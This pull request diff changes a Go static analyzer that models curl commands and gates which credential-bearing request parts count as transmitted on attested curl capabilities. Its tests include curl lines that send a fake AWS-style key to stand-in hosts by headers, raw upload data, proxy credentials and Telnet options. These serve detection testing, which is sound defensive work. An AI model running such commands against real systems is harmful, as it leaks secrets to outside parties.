### PR TITLE
fix(actionfacts): bind curl trusted-action proofs to capability facts

### DIFF
--- a/internal/actionfacts/analyze.go
+++ b/internal/actionfacts/analyze.go
@@ -171,6 +171,7 @@ func analyze(input Input) Facts {
 			dialect = DialectArgv
 		}
 		parsed := analyzeStructuredArgv(argv, startID, 0, dialect)
+		parsed.curlCapabilities = authenticatedCurlCapabilities(input.CurlCapabilities)
 		expandBoundedInlineInterpreters(&parsed, 0)
 		classifyOutput(&parsed)
 		enforceAnalyzeAuthority(&parsed)
@@ -187,6 +188,7 @@ func analyze(input Input) Facts {
 			base.markAmbiguous(IssueConflictingSources)
 		}
 		parsed := parseCommandAs(command, dialect, startID, 0)
+		parsed.curlCapabilities = authenticatedCurlCapabilities(input.CurlCapabilities)
 		expandBoundedInlineInterpreters(&parsed, 0)
 		classifyOutput(&parsed)
 		enforceAnalyzeAuthority(&parsed)

--- a/internal/actionfacts/curl_capability.go
+++ b/internal/actionfacts/curl_capability.go
@@ -198,7 +198,22 @@ func curlCommandAllowsProtocol(command CommandFact, protocol string) bool {
 }
 
 func curlCommandAllowsHTTPSProxyScheme(command CommandFact, scheme string) bool {
-	return scheme != "https" || curlCommandAllowsFeature(command, "https-proxy")
+	if scheme != "https" {
+		return true
+	}
+	// Nil capability is the conservative default: common curl builds
+	// still transmit proxy-user / URL credentials to https:// proxies.
+	// An attested inventory must include https-proxy before those facts
+	// stay open.
+	if command.curlCapability == nil {
+		return true
+	}
+	return curlCommandAllowsFeature(command, "https-proxy")
+}
+
+func curlCommandAttestsHTTPSProxy(command CommandFact) bool {
+	return command.curlCapability != nil &&
+		curlCommandAllowsFeature(command, "https-proxy")
 }
 
 func curlCommandAttestedSchemesValid(command CommandFact, parsed curlArgvParse) bool {

--- a/internal/actionfacts/curl_capability.go
+++ b/internal/actionfacts/curl_capability.go
@@ -17,9 +17,15 @@
 package actionfacts
 
 import (
+	"strconv"
 	"strings"
 	"unicode"
 )
+
+// curlModeledCapabilityVersion is the curl grammar ActionFacts models. Exact
+// restore accepts only this version; other nonempty strings, including 7.x
+// that lack --proxy-http2 (added in 8.1.0), cannot mint authority.
+const curlModeledCapabilityVersion = "8.7.1"
 
 // CurlCapability is trusted caller context describing one resolved curl
 // executable. ActionFacts never discovers it from GOOS, dialect, basename,
@@ -60,11 +66,56 @@ func authenticatedCurlCapabilities(candidates []CurlCapability) []CurlCapability
 }
 
 func curlCapabilityIdentityValid(capability CurlCapability) bool {
-	if capability.Executable == "" || capability.Version == "" ||
+	if capability.Executable == "" ||
+		!curlCapabilityVersionValid(capability.Version) ||
 		!curlCapabilityDigestValid(capability.Digest) {
 		return false
 	}
 	return true
+}
+
+func curlCapabilityVersionValid(version string) bool {
+	_, _, _, ok := parseCurlCapabilityVersion(version)
+	return ok && version == curlModeledCapabilityVersion
+}
+
+func parseCurlCapabilityVersion(version string) (major, minor, patch int, ok bool) {
+	parts := strings.Split(version, ".")
+	if len(parts) != 3 {
+		return 0, 0, 0, false
+	}
+	major, ok = parseCurlCapabilityVersionPart(parts[0])
+	if !ok {
+		return 0, 0, 0, false
+	}
+	minor, ok = parseCurlCapabilityVersionPart(parts[1])
+	if !ok {
+		return 0, 0, 0, false
+	}
+	patch, ok = parseCurlCapabilityVersionPart(parts[2])
+	if !ok {
+		return 0, 0, 0, false
+	}
+	return major, minor, patch, true
+}
+
+func parseCurlCapabilityVersionPart(part string) (int, bool) {
+	if part == "" {
+		return 0, false
+	}
+	if part[0] == '0' && len(part) > 1 {
+		return 0, false
+	}
+	for _, char := range part {
+		if char < '0' || char > '9' {
+			return 0, false
+		}
+	}
+	value, err := strconv.Atoi(part)
+	if err != nil || value < 0 {
+		return 0, false
+	}
+	return value, true
 }
 
 func curlCapabilityDigestValid(digest string) bool {
@@ -146,29 +197,108 @@ func curlCommandAllowsProtocol(command CommandFact, protocol string) bool {
 	return false
 }
 
-func curlFeatureDependentRequiredFeature(option curlOptionToken) string {
+func curlCommandAllowsHTTPSProxyScheme(command CommandFact, scheme string) bool {
+	return scheme != "https" || curlCommandAllowsFeature(command, "https-proxy")
+}
+
+func curlCommandAttestedSchemesValid(command CommandFact, parsed curlArgvParse) bool {
+	if command.curlCapability == nil {
+		return true
+	}
+	for _, target := range parsed.Targets {
+		scheme := curlEffectiveTransferScheme(parsed, target)
+		if curlSchemeRequiresProtocolAttestation(scheme) &&
+			!curlCommandAllowsProtocol(command, scheme) {
+			return false
+		}
+	}
+	for _, option := range parsed.Options {
+		if !option.ValuePresent || option.Value == "" {
+			continue
+		}
+		if !curlMainProxyOption(option.Canonical) &&
+			option.Canonical != "--preproxy" {
+			continue
+		}
+		scheme := curlEffectiveProxyURLScheme(option.Canonical, option.Value)
+		if curlSchemeRequiresProtocolAttestation(scheme) &&
+			!curlCommandAllowsProtocol(command, scheme) {
+			return false
+		}
+	}
+	return true
+}
+
+func curlEffectiveTransferScheme(parsed curlArgvParse, target curlTransferTarget) string {
+	if scheme := curlURLSchemeToken(target.Value); scheme != "" {
+		return scheme
+	}
+	if option, present := curlFinalGroupOption(
+		parsed, target.Group, "--proto-default",
+	); present {
+		return strings.ToLower(strings.TrimSpace(option.Value))
+	}
+	return "http"
+}
+
+func curlEffectiveProxyURLScheme(canonical, value string) string {
+	if scheme := curlURLSchemeToken(value); scheme != "" {
+		return scheme
+	}
+	switch canonical {
+	case "--socks4", "--socks4a", "--socks5", "--socks5-hostname":
+		return ""
+	default:
+		return "http"
+	}
+}
+
+func curlURLSchemeToken(value string) string {
+	delimiter := strings.IndexByte(value, ':')
+	if delimiter <= 0 {
+		return ""
+	}
+	scheme := strings.ToLower(value[:delimiter])
+	for _, char := range scheme {
+		if char < 'a' || char > 'z' {
+			return ""
+		}
+	}
+	return scheme
+}
+
+func curlSchemeRequiresProtocolAttestation(scheme string) bool {
+	switch scheme {
+	case "", "socks4", "socks4a", "socks5", "socks5h", "tcp":
+		return false
+	default:
+		return true
+	}
+}
+
+func curlFeatureDependentRequiredFeatures(option curlOptionToken) []string {
 	switch option.Canonical {
 	case "--compressed":
-		return "libz"
+		return []string{"libz"}
 	case "--http2", "--http2-prior-knowledge":
-		return "http2"
+		return []string{"http2"}
 	case "--http3", "--http3-only":
-		return "http3"
+		return []string{"http3"}
 	case "--ssl", "--ssl-reqd", "--ftp-ssl-control":
-		return "ssl"
+		return []string{"ssl"}
 	case "--negotiate", "--proxy-negotiate":
-		return "gss-api"
+		return []string{"gss-api"}
 	case "--ntlm", "--ntlm-wb", "--proxy-ntlm":
-		return "ntlm"
+		return []string{"ntlm"}
 	case "--proxy-http2":
-		return "https-proxy"
+		return []string{"https-proxy", "http2"}
 	case "--metalink":
-		return "metalink"
+		return []string{"metalink"}
 	case "--tcp-fastopen":
-		return "tcp-fastopen"
+		return []string{"tcp-fastopen"}
 	case "--wdebug":
-		return "wdebug"
+		return []string{"wdebug"}
 	default:
-		return ""
+		return nil
 	}
 }

--- a/internal/actionfacts/curl_capability.go
+++ b/internal/actionfacts/curl_capability.go
@@ -1,0 +1,174 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package actionfacts
+
+import (
+	"strings"
+	"unicode"
+)
+
+// CurlCapability is trusted caller context describing one resolved curl
+// executable. ActionFacts never discovers it from GOOS, dialect, basename,
+// PATH, or process state. The caller must authenticate identity and
+// invalidate stale generations before supplying this value.
+type CurlCapability struct {
+	Executable string
+	Digest     string
+	Version    string
+	Protocols  []string
+	Features   []string
+	Connector  string
+	SessionID  string
+	Generation int64
+}
+
+func authenticatedCurlCapabilities(candidates []CurlCapability) []CurlCapability {
+	if len(candidates) == 0 {
+		return nil
+	}
+	out := make([]CurlCapability, 0, len(candidates))
+	for _, candidate := range candidates {
+		if !curlCapabilityIdentityValid(candidate) {
+			continue
+		}
+		out = append(out, CurlCapability{
+			Executable: candidate.Executable,
+			Digest:     strings.ToLower(candidate.Digest),
+			Version:    candidate.Version,
+			Protocols:  cloneNormalizedCapabilityTokens(candidate.Protocols),
+			Features:   cloneNormalizedCapabilityTokens(candidate.Features),
+			Connector:  candidate.Connector,
+			SessionID:  candidate.SessionID,
+			Generation: candidate.Generation,
+		})
+	}
+	return out
+}
+
+func curlCapabilityIdentityValid(capability CurlCapability) bool {
+	if capability.Executable == "" || capability.Version == "" ||
+		!curlCapabilityDigestValid(capability.Digest) {
+		return false
+	}
+	return true
+}
+
+func curlCapabilityDigestValid(digest string) bool {
+	if len(digest) != 64 {
+		return false
+	}
+	for _, char := range digest {
+		if !unicode.Is(unicode.ASCII_Hex_Digit, char) {
+			return false
+		}
+	}
+	return true
+}
+
+func cloneNormalizedCapabilityTokens(values []string) []string {
+	if len(values) == 0 {
+		return nil
+	}
+	out := make([]string, 0, len(values))
+	seen := make(map[string]struct{}, len(values))
+	for _, value := range values {
+		normalized := strings.ToLower(strings.TrimSpace(value))
+		if normalized == "" {
+			continue
+		}
+		if _, exists := seen[normalized]; exists {
+			continue
+		}
+		seen[normalized] = struct{}{}
+		out = append(out, normalized)
+	}
+	return out
+}
+
+func matchCurlCapability(
+	candidates []CurlCapability,
+	command CommandFact,
+) *CurlCapability {
+	if command.Executable == "" {
+		return nil
+	}
+	var matched *CurlCapability
+	for index := range candidates {
+		candidate := &candidates[index]
+		if candidate.Executable != command.Executable {
+			continue
+		}
+		if matched != nil {
+			return nil
+		}
+		matched = candidate
+	}
+	return matched
+}
+
+func curlCommandAllowsFeature(command CommandFact, feature string) bool {
+	if command.curlCapability == nil || feature == "" {
+		return false
+	}
+	want := strings.ToLower(feature)
+	for _, have := range command.curlCapability.Features {
+		if have == want {
+			return true
+		}
+	}
+	return false
+}
+
+func curlCommandAllowsProtocol(command CommandFact, protocol string) bool {
+	if command.curlCapability == nil || protocol == "" {
+		return false
+	}
+	want := strings.ToLower(protocol)
+	for _, have := range command.curlCapability.Protocols {
+		if have == want {
+			return true
+		}
+	}
+	return false
+}
+
+func curlFeatureDependentRequiredFeature(option curlOptionToken) string {
+	switch option.Canonical {
+	case "--compressed":
+		return "libz"
+	case "--http2", "--http2-prior-knowledge":
+		return "http2"
+	case "--http3", "--http3-only":
+		return "http3"
+	case "--ssl", "--ssl-reqd", "--ftp-ssl-control":
+		return "ssl"
+	case "--negotiate", "--proxy-negotiate":
+		return "gss-api"
+	case "--ntlm", "--ntlm-wb", "--proxy-ntlm":
+		return "ntlm"
+	case "--proxy-http2":
+		return "https-proxy"
+	case "--metalink":
+		return "metalink"
+	case "--tcp-fastopen":
+		return "tcp-fastopen"
+	case "--wdebug":
+		return "wdebug"
+	default:
+		return ""
+	}
+}

--- a/internal/actionfacts/curl_capability_test.go
+++ b/internal/actionfacts/curl_capability_test.go
@@ -451,3 +451,102 @@ func TestCurlCapabilityProtocolAndHTTPSProxyRestore(t *testing.T) {
 		})
 	}
 }
+
+func TestReducedCapabilityClosesHTTPSProxyObserverLanes(t *testing.T) {
+	t.Parallel()
+
+	const token = "AKIA7Q2M9X4B6C8D3F5H"
+	reduced := testCurlCapability(
+		curlCapabilityReducedDigest,
+		[]string{"http", "https"},
+		[]string{"ssl"},
+	)
+	for _, test := range []struct {
+		name            string
+		input           Input
+		wantUpload      bool
+		wantProxyHost   string
+		rejectProxyHost string
+	}{
+		{
+			name: "HTTPS proxy without capability still projects inline upload",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy", "https://proxy.example",
+					"--data-raw", token, "http://origin.example/upload",
+				},
+			},
+			wantUpload:    true,
+			wantProxyHost: "proxy.example",
+		},
+		{
+			name: "reduced capability closes HTTPS proxy inline upload",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy", "https://proxy.example",
+					"--data-raw", token, "http://origin.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{reduced},
+			},
+			rejectProxyHost: "proxy.example",
+		},
+		{
+			name: "HTTPS chain without capability still copies proxy hostname onto SOCKS",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--preproxy", "socks5h://preproxy.example",
+					"--proxy", "https://proxy.example",
+					"--data-raw", token, "http://origin.example/upload",
+				},
+			},
+			wantUpload:    true,
+			wantProxyHost: "proxy.example",
+		},
+		{
+			name: "reduced capability closes HTTPS chain upload and SOCKS hostname",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--preproxy", "socks5h://preproxy.example",
+					"--proxy", "https://proxy.example",
+					"--data-raw", token, "http://origin.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{reduced},
+			},
+			rejectProxyHost: "proxy.example",
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(test.input)
+			if len(facts.Commands) != 1 {
+				t.Fatalf("commands = %#v", facts.Commands)
+			}
+			command := facts.Commands[0]
+			uploads := StaticCurlProxyUploadPayloads(command)
+			foundUpload := false
+			for _, component := range uploads {
+				if component.Value == token && component.Host == test.wantProxyHost {
+					foundUpload = true
+				}
+				if test.rejectProxyHost != "" && component.Host == test.rejectProxyHost {
+					t.Fatalf("reduced capability leaked HTTPS proxy upload %#v", component)
+				}
+			}
+			if foundUpload != test.wantUpload {
+				t.Fatalf("HTTPS proxy upload = %t, want %t payloads=%#v",
+					foundUpload, test.wantUpload, uploads)
+			}
+			for _, component := range staticCurlPreproxyDestinationHostnameComponents(command) {
+				if test.rejectProxyHost != "" && component.Value == test.rejectProxyHost {
+					t.Fatalf("reduced capability leaked HTTPS proxy hostname %#v",
+						component)
+				}
+			}
+		})
+	}
+}

--- a/internal/actionfacts/curl_capability_test.go
+++ b/internal/actionfacts/curl_capability_test.go
@@ -28,6 +28,14 @@ func testCurlCapability(digest string, protocols, features []string) CurlCapabil
 	}
 }
 
+func testCurlHTTPSProxyCapability() CurlCapability {
+	return testCurlCapability(
+		curlCapabilityFullDigest,
+		[]string{"http", "https"},
+		[]string{"https-proxy", "ssl"},
+	)
+}
+
 func TestCurlCapabilityFactsStayCallerAuthenticated(t *testing.T) {
 	t.Parallel()
 
@@ -185,6 +193,53 @@ func TestCurlCapabilityFactsStayCallerAuthenticated(t *testing.T) {
 			},
 			wantHeader: true,
 		},
+		{
+			name: "proxy-http2 stays closed without http2",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy-http2", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{testCurlCapability(
+					curlCapabilityFullDigest,
+					[]string{"http", "https"},
+					[]string{"https-proxy", "ssl"},
+				)},
+			},
+		},
+		{
+			name: "version 7.88.1 cannot authorize proxy-http2",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy-http2", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{{
+					Executable: "curl",
+					Digest:     curlCapabilityFullDigest,
+					Version:    "7.88.1",
+					Protocols:  []string{"http", "https"},
+					Features:   []string{"https-proxy", "http2", "ssl"},
+				}},
+			},
+		},
+		{
+			name: "libz without protocols cannot restore compressed header",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--compressed", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{testCurlCapability(
+					curlCapabilityFullDigest,
+					nil,
+					[]string{"libz"},
+				)},
+			},
+		},
 	} {
 		test := test
 		t.Run(test.name, func(t *testing.T) {
@@ -218,6 +273,179 @@ func TestCurlCapabilityFactsStayCallerAuthenticated(t *testing.T) {
 			if hasHost != test.wantHTTPSHostname {
 				t.Fatalf("HTTPS proxy hostname = %t, want %t hosts=%#v",
 					hasHost, test.wantHTTPSHostname, hosts)
+			}
+		})
+	}
+}
+
+func TestCurlCapabilityProtocolAndHTTPSProxyRestore(t *testing.T) {
+	t.Parallel()
+
+	const token = "AKIA7Q2M9X4B6C8D3F5H"
+	httpHTTPS := testCurlCapability(
+		curlCapabilityFullDigest,
+		[]string{"http", "https"},
+		[]string{"https-proxy", "http2", "ssl"},
+	)
+	for _, test := range []struct {
+		name             string
+		input            Input
+		wantTelnet       bool
+		wantProxyUser    bool
+		wantProxyPath    bool
+		wantAfterConnect bool
+		wantHeader       bool
+	}{
+		{
+			name: "http https protocols cannot authorize Telnet projection",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--telnet-option", "TTYPE=" + token,
+					"telnet://sink.example",
+				},
+				CurlCapabilities: []CurlCapability{httpHTTPS},
+			},
+		},
+		{
+			name: "missing capability keeps Telnet projection",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--telnet-option", "TTYPE=" + token,
+					"telnet://sink.example",
+				},
+			},
+			wantTelnet: true,
+		},
+		{
+			name: "HTTPS proxy without capability hides proxy-user and path",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy", "https://proxy.example",
+					"--proxy-user", "proxy:" + token,
+					"http://origin.example/secrets/" + token,
+				},
+			},
+		},
+		{
+			name: "attested https-proxy restores proxy-user and path",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy", "https://proxy.example",
+					"--proxy-user", "proxy:" + token,
+					"http://origin.example/secrets/" + token,
+				},
+				CurlCapabilities: []CurlCapability{testCurlHTTPSProxyCapability()},
+			},
+			wantProxyUser: true,
+			wantProxyPath: true,
+		},
+		{
+			name: "HTTPS after-CONNECT stays closed without capability",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "-p", "--proxy", "https://proxy.example",
+					"--header", "X-Key: " + token, "http://127.0.0.1/upload",
+				},
+			},
+			wantHeader: true,
+		},
+		{
+			name: "attested https-proxy restores after-CONNECT path and header",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "-p", "--proxy", "https://proxy.example",
+					"--header", "X-Key: " + token, "http://127.0.0.1/upload",
+				},
+				CurlCapabilities: []CurlCapability{testCurlHTTPSProxyCapability()},
+			},
+			wantAfterConnect: true,
+			wantHeader:       true,
+		},
+		{
+			name: "proxy-http2 restores when https-proxy and http2 are attested",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy-http2", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{httpHTTPS},
+			},
+			wantHeader: true,
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(test.input)
+			if len(facts.Commands) != 1 {
+				t.Fatalf("commands = %#v", facts.Commands)
+			}
+			command := facts.Commands[0]
+			telnet := StaticCurlTelnetOptionRequestComponents(command)
+			hasTelnet := false
+			for _, component := range telnet {
+				if component.Value == token && component.Scheme == "telnet" {
+					hasTelnet = true
+					break
+				}
+			}
+			if hasTelnet != test.wantTelnet {
+				t.Fatalf("Telnet projection = %t, want %t components=%#v",
+					hasTelnet, test.wantTelnet, telnet)
+			}
+			proxy := StaticCurlProxyTransmittedMetadata(command)
+			hasProxyUser := false
+			hasProxyPath := false
+			for _, component := range proxy.ProxyRequestComponents {
+				if component.Value == "proxy:"+token {
+					hasProxyUser = true
+				}
+				if component.Value == "/secrets/"+token {
+					hasProxyPath = true
+				}
+			}
+			if hasProxyUser != test.wantProxyUser {
+				t.Fatalf("proxy-user projected = %t, want %t components=%#v",
+					hasProxyUser, test.wantProxyUser, proxy.ProxyRequestComponents)
+			}
+			if hasProxyPath != test.wantProxyPath {
+				t.Fatalf("proxy path projected = %t, want %t components=%#v",
+					hasProxyPath, test.wantProxyPath, proxy.ProxyRequestComponents)
+			}
+			after := staticCurlHTTPAfterCONNECTRequestComponents(command)
+			hasAfterHeader := false
+			hasAfterPath := false
+			for _, component := range after {
+				if component.Value == "X-Key: "+token {
+					hasAfterHeader = true
+				}
+				if component.Value == "/upload" {
+					hasAfterPath = true
+				}
+			}
+			gotAfter := hasAfterHeader && hasAfterPath
+			if gotAfter != test.wantAfterConnect {
+				t.Fatalf("after-CONNECT = %t, want %t components=%#v",
+					gotAfter, test.wantAfterConnect, after)
+			}
+			headers := StaticCurlTransmittedMetadata(command).Headers
+			hasHeader := false
+			for _, header := range headers {
+				if header == "X-Key: "+token {
+					hasHeader = true
+					break
+				}
+			}
+			if hasHeader != test.wantHeader {
+				t.Fatalf("header projected = %t, want %t headers=%#v",
+					hasHeader, test.wantHeader, headers)
 			}
 		})
 	}

--- a/internal/actionfacts/curl_capability_test.go
+++ b/internal/actionfacts/curl_capability_test.go
@@ -319,7 +319,7 @@ func TestCurlCapabilityProtocolAndHTTPSProxyRestore(t *testing.T) {
 			wantTelnet: true,
 		},
 		{
-			name: "HTTPS proxy without capability hides proxy-user and path",
+			name: "HTTPS proxy without capability still projects proxy-user",
 			input: Input{
 				Tool: "exec",
 				Argv: []string{
@@ -328,6 +328,7 @@ func TestCurlCapabilityProtocolAndHTTPSProxyRestore(t *testing.T) {
 					"http://origin.example/secrets/" + token,
 				},
 			},
+			wantProxyUser: true,
 		},
 		{
 			name: "attested https-proxy restores proxy-user and path",

--- a/internal/actionfacts/curl_capability_test.go
+++ b/internal/actionfacts/curl_capability_test.go
@@ -1,0 +1,224 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// SPDX-License-Identifier: Apache-2.0
+
+package actionfacts
+
+import (
+	"testing"
+)
+
+const (
+	curlCapabilityFullDigest    = "0ed6d849d5d5260894e13a38f1a02d532d83a8c1893229b1958ea8181fcb9d5d"
+	curlCapabilityReducedDigest = "f2d7ed604038219b2d63143cddc4baa489bc0c8869d0572270132eabffc38755"
+)
+
+func testCurlCapability(digest string, protocols, features []string) CurlCapability {
+	return CurlCapability{
+		Executable: "curl",
+		Digest:     digest,
+		Version:    "8.7.1",
+		Protocols:  protocols,
+		Features:   features,
+		Connector:  "codex",
+		SessionID:  "session-capability",
+		Generation: 1,
+	}
+}
+
+func TestCurlCapabilityFactsStayCallerAuthenticated(t *testing.T) {
+	t.Parallel()
+
+	const token = "AKIA7Q2M9X4B6C8D3F5H"
+	full := testCurlCapability(
+		curlCapabilityFullDigest,
+		[]string{"http", "https", "file", "telnet"},
+		[]string{"libz", "https-proxy", "ssl"},
+	)
+	reduced := testCurlCapability(
+		curlCapabilityReducedDigest,
+		[]string{"http", "https"},
+		[]string{"ssl"},
+	)
+	for _, test := range []struct {
+		name              string
+		input             Input
+		wantHeader        bool
+		wantHTTPSHostname bool
+	}{
+		{
+			name: "missing capability keeps compressed detection only",
+			input: Input{Tool: "exec", Argv: []string{
+				"curl", "--compressed", "--header", "X-Key: " + token,
+				"https://sink.example/upload",
+			}},
+		},
+		{
+			name: "full capability authorizes compressed header",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--compressed", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{full},
+			},
+			wantHeader: true,
+		},
+		{
+			name: "reduced capability still closes compressed",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--compressed", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{reduced},
+			},
+		},
+		{
+			name: "invalid digest cannot mint authority",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--compressed", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{
+					testCurlCapability("not-a-sha256-digest", full.Protocols, full.Features),
+				},
+			},
+		},
+		{
+			name: "path identity cannot substitute for argv executable",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--compressed", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{{
+					Executable: "/usr/bin/curl",
+					Digest:     curlCapabilityFullDigest,
+					Version:    "8.7.1",
+					Features:   []string{"libz"},
+				}},
+			},
+		},
+		{
+			name: "duplicate matching capabilities are ambiguous",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--compressed", "--header", "X-Key: " + token,
+					"https://sink.example/upload",
+				},
+				CurlCapabilities: []CurlCapability{full, full},
+			},
+		},
+		{
+			name: "GOOS dialect and System32 path cannot authenticate capability",
+			input: Input{
+				Tool:        "PowerShell",
+				Command:     `& 'C:\Windows\System32\curl.exe' --compressed --header "X-Key: ` + token + `" https://sink.example/upload`,
+				DialectHint: DialectPowerShell,
+				CurlCapabilities: []CurlCapability{{
+					Executable: "curl",
+					Digest:     curlCapabilityFullDigest,
+					Version:    "8.7.1",
+					Features:   []string{"libz"},
+				}},
+			},
+		},
+		{
+			name: "HTTPS proxy hostname requires https-proxy feature",
+			input: Input{Tool: "exec", Argv: []string{
+				"curl", "--proxy", "https://proxy.example",
+				"http://origin.example/safe",
+			}},
+		},
+		{
+			name: "full capability proves HTTPS proxy origin hostname",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy", "https://proxy.example",
+					"http://origin.example/safe",
+				},
+				CurlCapabilities: []CurlCapability{full},
+			},
+			wantHTTPSHostname: true,
+		},
+		{
+			name: "reduced capability still hides HTTPS proxy hostname",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proxy", "https://proxy.example",
+					"http://origin.example/safe",
+				},
+				CurlCapabilities: []CurlCapability{reduced},
+			},
+		},
+		{
+			name: "overwritten proto-default file does not become HTTP",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proto-default", "http", "--proto-default", "file",
+					"--header", "X-Key: " + token, "origin.example/safe",
+				},
+				CurlCapabilities: []CurlCapability{full},
+			},
+		},
+		{
+			name: "overwritten proto-default recovers HTTP",
+			input: Input{
+				Tool: "exec",
+				Argv: []string{
+					"curl", "--proto-default", "file", "--proto-default", "http",
+					"--header", "X-Key: " + token, "https://sink.example/safe",
+				},
+				CurlCapabilities: []CurlCapability{full},
+			},
+			wantHeader: true,
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(test.input)
+			if len(facts.Commands) != 1 {
+				t.Fatalf("commands = %#v", facts.Commands)
+			}
+			headers := StaticCurlTransmittedMetadata(facts.Commands[0]).Headers
+			hasHeader := false
+			for _, header := range headers {
+				if header == "X-Key: "+token {
+					hasHeader = true
+					break
+				}
+			}
+			if hasHeader != test.wantHeader {
+				t.Fatalf("header projected = %t, want %t headers=%#v",
+					hasHeader, test.wantHeader, headers)
+			}
+			hosts := StaticCurlProxyTransmittedMetadata(facts.Commands[0]).
+				ProxyDestinationHostnameComponents
+			hasHost := false
+			for _, host := range hosts {
+				if host.Value == "origin.example" && host.Scheme == "https" &&
+					host.Host == "proxy.example" {
+					hasHost = true
+					break
+				}
+			}
+			if hasHost != test.wantHTTPSHostname {
+				t.Fatalf("HTTPS proxy hostname = %t, want %t hosts=%#v",
+					hasHost, test.wantHTTPSHostname, hosts)
+			}
+		})
+	}
+}

--- a/internal/actionfacts/curl_http_after_connect.go
+++ b/internal/actionfacts/curl_http_after_connect.go
@@ -18,10 +18,9 @@ package actionfacts
 
 // staticCurlHTTPAfterCONNECTRequestComponents rebinds already-proved origin
 // HTTP path, query, ordinary headers, and origin authentication onto the
-// explicit HTTP proxy that observes those bytes after CONNECT. HTTPS origin
-// request bytes stay excluded: they are encrypted inside the tunnel. HTTPS
-// proxies are excluded: https-proxy is a separate libcurl capability, and
-// this lane has no executable capability fact.
+// explicit HTTP(S) proxy that observes those bytes after CONNECT. HTTPS
+// origin request bytes stay excluded: they are encrypted inside the tunnel.
+// HTTPS proxies require attested https-proxy before this lane projects.
 func staticCurlHTTPAfterCONNECTRequestComponents(
 	command CommandFact,
 ) []TransmittedRequestComponent {
@@ -30,10 +29,8 @@ func staticCurlHTTPAfterCONNECTRequestComponents(
 		proxy, parsed, ok = staticCurlHTTPProxyChainDestination(command)
 	}
 	if !ok || proxy.Scheme != "http" && proxy.Scheme != "https" ||
-		len(parsed.Targets) == 0 {
-		return nil
-	}
-	if proxy.Scheme == "https" {
+		len(parsed.Targets) == 0 ||
+		!curlCommandAllowsHTTPSProxyScheme(command, proxy.Scheme) {
 		return nil
 	}
 	group := parsed.Targets[0].Group

--- a/internal/actionfacts/curl_http_after_connect.go
+++ b/internal/actionfacts/curl_http_after_connect.go
@@ -29,8 +29,10 @@ func staticCurlHTTPAfterCONNECTRequestComponents(
 		proxy, parsed, ok = staticCurlHTTPProxyChainDestination(command)
 	}
 	if !ok || proxy.Scheme != "http" && proxy.Scheme != "https" ||
-		len(parsed.Targets) == 0 ||
-		!curlCommandAllowsHTTPSProxyScheme(command, proxy.Scheme) {
+		len(parsed.Targets) == 0 {
+		return nil
+	}
+	if proxy.Scheme == "https" && !curlCommandAttestsHTTPSProxy(command) {
 		return nil
 	}
 	group := parsed.Targets[0].Group

--- a/internal/actionfacts/curl_http_after_connect_test.go
+++ b/internal/actionfacts/curl_http_after_connect_test.go
@@ -17,6 +17,7 @@ func TestStaticCurlHTTPAfterCONNECTRequestComponents(t *testing.T) {
 	for _, test := range []struct {
 		name              string
 		argv              []string
+		caps              []CurlCapability
 		want              []string
 		wantScheme        string
 		wantHost          string
